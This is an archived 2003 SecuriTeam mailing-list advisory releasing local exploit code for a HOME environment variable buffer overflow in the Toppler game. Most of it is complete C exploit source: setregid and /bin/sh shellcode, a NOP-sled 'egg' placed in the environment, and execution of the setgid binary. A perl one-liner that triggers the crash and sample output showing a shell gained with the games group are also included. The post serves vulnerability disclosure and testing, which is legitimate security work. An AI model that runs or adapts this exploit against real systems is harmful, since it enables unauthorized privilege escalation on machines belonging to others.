[EXPL] Exploit Code Release for Toppler Game Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 07/08/03

  • Next message: SecuriTeam: "[TOOL] Disco, a Passive IP Discovery Tool" 
    To: list@securiteam.com
Date: 8 Jul 2003 14:46:32 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security in Canada

    Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
    We welcome ISPs, system integrators and IT systems resellers
    to promote the most advanced vulnerability assessment solutions today.

    Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

    - - - - - - - - -

      Exploit Code Release for Toppler Game Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

     <http://toppler.sourceforge.net/> toppler is an almost complete
    reimplementation of the old game known as Tower Toppler or Nebulous. This
    game was available at least for PC, Atari, and C64 and now the PC version
    is abandonware. A locally exploitable buffer overflow in the product
    allows local users to cause the product to execute arbitrary code by
    issuing a long HOME environment variable. The following exploit code can
    be used to test your system for the mentioned vulnerability.

    DETAILS

    Exploit:
    /*
        LOCAL TOPPLER EXPLOIT

      A Buffer overflow in HOME environment variable.
      Just your standard stack overflow...

      [bobby@blah Code]$export HOME=`perl -e 'print"A"x144'`
      
      [bobby@blah Code]$ /usr/bin/toppler
      Nebulous version 0.96
      Segmentation fault

      Should give a GID=20 on successful exploitation.

      [bobby@blah Code]$ id
      uid=501(bobby) gid=501(bobby) groups=501(bobby)

      
      [bobby@blah Code]$ ./FBHtoppler
      Using address: 0xbffff81c
      sh-2.05b$id
      uid=501(bobby) gid=20(games) groups=501(bobby)

      Kinda weird but could be useful in some situations...:P

           SYSTEM TESTED ON:
        Mandrake Linux release 9.0 (dolphin) for i586

    Greetz: USG , DarkCode , DkD , Johan , s4t4nic_s0uls , Dj king , hein
    , hyperd0t ,
      RunningMan(thanx for the java), kafka ,Cc0d3r ,wazzabi(thx for the rza
    album)
      
      also , greetz to the dtor team.
      
      Not forgetting all of the FBH crew too.. heh .pk rules!!!
      
      
      FBHowns@hushmail.com , comments + criticisms welcome :P
    */

    #include <stdlib.h>
    #include <stdio.h>

    #define DEFAULT_OFFSET 0
    #define BUFFER_SIZE 250 // buffer is 144 , made larger
    by 100+ for easy exploiting
    #define EGG_SIZE 2048
    #define NOP 0x90
    #define ALIGN 1
    #define BINARY "/usr/bin/toppler" //path to binary
    char shellcode[] =

    /*setregid(20,20) shellcode by me */

    "\x31\xc0" /* xor %eax, %eax */
    "\x31\xdb" /* xor %ebx, %ebx */
    "\x31\xc9" /* xor %ecx, %ecx */
    "\xb3\x14" /* mov $0x14, %bl */
    "\xb1\x14" /* mov $0x14, %cl */
    "\xb0\x47" /* mov $0x47, %al */
    "\xcd\x80" /* int $0x80 */

     
     /* Shellcode by Aleph One */
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    unsigned long get_esp(void) {
       __asm__("movl %esp,%eax");
    }

    void main(int argc, char *argv[]) {
      

      char *buffer, *ptr, *egg;
      
      long *address_p, addr;
      
      int offset= DEFAULT_OFFSET, bsize= BUFFER_SIZE;
      
      int i, egg_size= EGG_SIZE;

      if (argc > 1) bsize = atoi(argv[1]);
      if (argc > 2) offset = atoi(argv[2]);
      if (argc > 3) egg_size = atoi(argv[3]);

      if (!(buffer = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
      }
      
      if (!(egg = malloc(egg_size))) {
        printf("Can't allocate memory.\n");
        exit(0);
      }

      addr = get_esp() - offset;
      printf("Using address: 0x%x\n", addr);

      ptr = buffer;
      address_p = (long *) (ptr+ALIGN);
      for (i = 0; i < bsize; i+=4)
        *(address_p++) = addr;

      ptr = egg;
      for (i = 0; i < egg_size - strlen(shellcode) - 1; i++)
        *(ptr++) = NOP;

      for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

      buffer[bsize - 1] = '\0'; // '\0' or else there wil be trouble
      egg[egg_size - 1] = '\0';

      memcpy(egg,"EGG=",4);
      putenv(egg); // put our made egg in the env
      memcpy(buffer,"HOME=",5);
      putenv(buffer); // put our prepared buffer in env
      execlp(BINARY,BINARY,0); // execute it
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:FBHowns@hushmail.com>
    FBHowns.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[TOOL] Disco, a Passive IP Discovery Tool"